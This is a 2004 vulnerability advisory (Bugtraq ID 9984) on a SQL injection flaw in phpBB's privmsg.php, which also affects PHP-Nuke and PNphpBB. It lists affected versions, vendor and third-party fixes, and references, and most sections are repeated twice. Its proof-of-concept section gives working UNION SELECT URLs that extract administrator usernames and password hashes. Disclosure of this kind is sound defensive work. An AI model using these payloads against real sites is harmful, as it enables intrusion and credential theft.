PHPBB Privmsg.PHP SQL Injection Vulnerability
BID:9984
Info
PHPBB Privmsg.PHP SQL Injection Vulnerability
| Bugtraq ID: | 9984 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2004 12:00AM |
| Updated: | Mar 26 2004 12:00AM |
| Credit: | Discovery of this issue is credited to Janek Vind <[email protected]> |
| Vulnerable: |
PNphpBB PNphpBB 1.2 g PNphpBB PNphpBB 1.2 f PNphpBB PNphpBB 1.2 phpBB Group phpBB 2.0.8 phpBB Group phpBB 2.0.7 a phpBB Group phpBB 2.0.7 phpBB Group phpBB 2.0.6 d phpBB Group phpBB 2.0.6 c phpBB Group phpBB 2.0.6 phpBB Group phpBB 2.0.5 phpBB Group phpBB 2.0.4 phpBB Group phpBB 2.0.3 phpBB Group phpBB 2.0.2 phpBB Group phpBB 2.0.1 phpBB Group phpBB 2.0 .0 phpBB Group phpBB 2.0 RC4 phpBB Group phpBB 2.0 RC3 phpBB Group phpBB 2.0 RC2 phpBB Group phpBB 2.0 RC1 phpBB Group phpBB 2.0 Beta 1 Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 FINAL Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP-Nuke 6.7 Francisco Burzi PHP-Nuke 6.6 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0 |
| Not Vulnerable: | |
Discussion
PHPBB Privmsg.PHP SQL Injection Vulnerability
Reportedly the 'privmsg.php' phpBB script is prone to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameters before using them to construct SQL queries to be issued to the underlying database.
This may allow a remote attacker to manipulate query logic, potentially leading to access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.
Reportedly the 'privmsg.php' phpBB script is prone to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI parameters before using them to construct SQL queries to be issued to the underlying database.
This may allow a remote attacker to manipulate query logic, potentially leading to access to sensitive information such as the administrator password hash or corruption of database data. SQL injection attacks may also potentially be used to exploit latent vulnerabilities in the underlying database implementation.
Exploit / POC
PHPBB Privmsg.PHP SQL Injection Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
phpBB:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*
PHP-Nuke:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
The following proof of concept has been provided by JeiAr <[email protected]>:
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Pnphpbb:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]
No exploit is required to leverage this issue. The following proof of concept has been provided:
phpBB:
http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/*
PHP-Nuke:
http://localhost/nuke69j1/modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
The following proof of concept has been provided by JeiAr <[email protected]>:
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
Pnphpbb:
http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]
Solution / Fix
PHPBB Privmsg.PHP SQL Injection Vulnerability
Solution:
The following untested and unverified solution to this issue has been provided by JeiAr <[email protected]>.
Replace this:
$pm_sql_user .= "<random_query_data>";
With this:
$pm_sql_user = '';
$pm_sql_user .= "<random_query_data>";
The following patch has been provided by Shaun Colley <[email protected]>. It should be noted that this patch has not been verified by Symantec:
http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch
The vendor has posted a fix to resolve this issue. It has been suggested by the vendor that the following change will produce positive results:
FIND - Line 215:
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
REPLACE WITH:
$pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
It has also been reported that all available versions of the software have been updated with this fix; any version of the software previously vulnerable will no longer be when acquired from the vendor web site.
Solution:
The following untested and unverified solution to this issue has been provided by JeiAr <[email protected]>.
Replace this:
$pm_sql_user .= "<random_query_data>";
With this:
$pm_sql_user = '';
$pm_sql_user .= "<random_query_data>";
The following patch has been provided by Shaun Colley <[email protected]>. It should be noted that this patch has not been verified by Symantec:
http://www.nettwerked.co.uk/code/privmsg-sqlinj.patch
The vendor has posted a fix to resolve this issue. It has been suggested by the vendor that the following change will produce positive results:
FIND - Line 215:
$pm_sql_user .= "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
REPLACE WITH:
$pm_sql_user = "AND ( ( pm.privmsgs_to_userid = " . $userdata['user_id'] . "
It has also been reported that all available versions of the software have been updated with this fix; any version of the software previously vulnerable will no longer be when acquired from the vendor web site.
References
PHPBB Privmsg.PHP SQL Injection Vulnerability
References:
References:
- phpBB Homepage (phpBB)
- PHPNuke INP Homepage (PHPNuke INP)
- PNphpBB Homepage (PNphpBB)
- [waraxe-2004-SA#013] - Critical sql injection bug in PhpBB 2.0.8 (Janek Vind
) - Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor (JoCaNoR SeCuRiTy TeaM)
- Re: [waraxe-2004-SA#013 - Critical sql injection bug in PhpBB 2.0.8 (JeiAr
)